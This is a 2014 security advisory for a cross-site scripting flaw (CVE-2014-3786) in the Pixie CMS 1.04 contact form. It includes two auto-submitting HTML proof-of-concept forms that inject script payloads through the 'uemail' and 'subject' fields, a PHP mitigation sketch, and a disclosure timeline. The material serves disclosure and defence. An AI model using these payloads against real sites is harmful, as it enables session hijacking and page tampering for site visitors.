
Pixie CMS 1.04 Cross Site Scripting

Posted May 30, 2014
Authored by Simone Memoli, Filippos Mastrogiannis

Pixie CMS version 1.04 suffers from multiple POST cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
advisories | CVE-2014-3786
SHA-256 | 44f2f2eb8165bcff34e009a24bd9116339537e4a7a92bbd61f1e3495c632eb87

Pixie CMS v1.04 (Contact form) POST XSS Vulnerabilities

Vendor: Pixie CMS
Product web page: http://www.getpixie.co.uk
Affected version: 1.04
Severity: Medium
CVE: CVE-2014-3786
Demo page: http://demo.getpixie.co.uk

Discovered by: Filippos Mastrogiannis (@filipposmastro)
& Simone Memoli (@Simon90_Italy)

Pixie is free, open source CMS software, a.k.a. a small, simple
website maker (as the vendor states on its website).

Description: Pixie (v1.04) suffers from several POST XSS vulnerabilities in
the Contact form (contact.php). User input passed through the POST parameters
'uemail' and 'subject' is not properly sanitized, allowing an attacker to
execute HTML code in a user's browser session on the affected site.

The vulnerable component is the contact module of Pixie v1.04, which can be
found at /pixie_v1.04/admin/modules/contact.php in the source code.

Tested on: Ubuntu 13.10 with Mozilla Firefox 29.0 / Microsoft Windows 7
with Mozilla Firefox 29.0.1

Proof Of Concept:

<html>
<title>Pixie CMS v1.04 Contact form (uemail parameter) XSS</title>
<form name="xss" action="http://demo.getpixie.co.uk/contact/" method="post">
<input type="hidden" name='uemail' value='"><img src=x onerror=prompt(document.domain);>'>
<input type="hidden" name='contact' value='1'>
<input type="hidden" name='subject' value='xss'>
</form>
<script>document.xss.submit();</script>
</html>

<html>
<title>Pixie CMS v1.04 Contact form (subject parameter) XSS</title>
<form name="xss" action="http://demo.getpixie.co.uk/contact/" method="post">
<input type="hidden" name='uemail' value='xss'>
<input type="hidden" name='contact' value='1'>
<input type="hidden" name='subject' value='"><img src=x onerror=prompt(document.location);>'>
</form>
<script>document.xss.submit();</script>
</html>
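
Mitigation sketch (an added example, not part of the original advisory and not Pixie's own code): the weak pattern of echoing a POST value straight into a value="..." attribute, beside the output-encoded form. Only the parameter names 'uemail' and 'subject' come from the advisory; the function names, the form markup and the 200-character subject limit are assumptions.

```php
<?php
// Added example, NOT Pixie's contact.php. Only the field names 'uemail' and
// 'subject' come from the advisory; all function names here are hypothetical.

/** Encode a value for a quoted HTML attribute or element body. */
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Weak pattern (assumed): raw request data concatenated into value="...". */
function render_field_unsafe(string $name, string $value): string
{
    return '<input type="text" name="' . $name . '" value="' . $value . '">';
}

/** Hardened: same markup, every dynamic part encoded for the attribute context. */
function render_field_safe(string $name, string $value): string
{
    return '<input type="text" name="' . attr($name) . '" value="' . attr($value) . '">';
}

/** Input validation as a second layer; output encoding stays mandatory. */
function clean_contact_input(array $post): array
{
    // Reject non-string values (e.g. uemail[]=x) instead of casting them.
    $email   = is_string($post['uemail'] ?? null) ? trim($post['uemail']) : '';
    $subject = is_string($post['subject'] ?? null) ? trim($post['subject']) : '';
    $errors  = [];
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        $errors[] = 'uemail is not a valid e-mail address';
    }
    // The 200-character limit is an assumed policy, not a Pixie setting.
    if ($subject === '' || strlen($subject) > 200 || preg_match('/[\r\n]/', $subject)) {
        $errors[] = 'subject must be 1-200 characters on a single line';
    }
    return ['uemail' => $email, 'subject' => $subject, 'errors' => $errors];
}

// Constructed sample input: the uemail value from the proof of concept above.
$post = ['uemail' => '"><img src=x onerror=prompt(document.domain);>',
         'contact' => '1', 'subject' => 'xss'];
$in = clean_contact_input($post);

echo render_field_unsafe('uemail', $in['uemail']), "\n"; // quote closes the attribute early
echo render_field_safe('uemail', $in['uemail']), "\n";   // payload stays inside value="..."
echo implode('; ', $in['errors']), "\n";                 // validation also rejects the value
```

Validation alone is not the fix: a syntactically valid value can still carry markup characters, so the encoding in render_field_safe() is what keeps the input inside the attribute.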


Disclosure Timeline:

[13.05.2014] Vulnerabilities discovered.
[13.05.2014] Initial contact with the vendor.
[15.05.2014] 1st response from the official maintainer.
[30.05.2014] 2nd response from the official maintainer.
[30.05.2014] Public security advisory released.
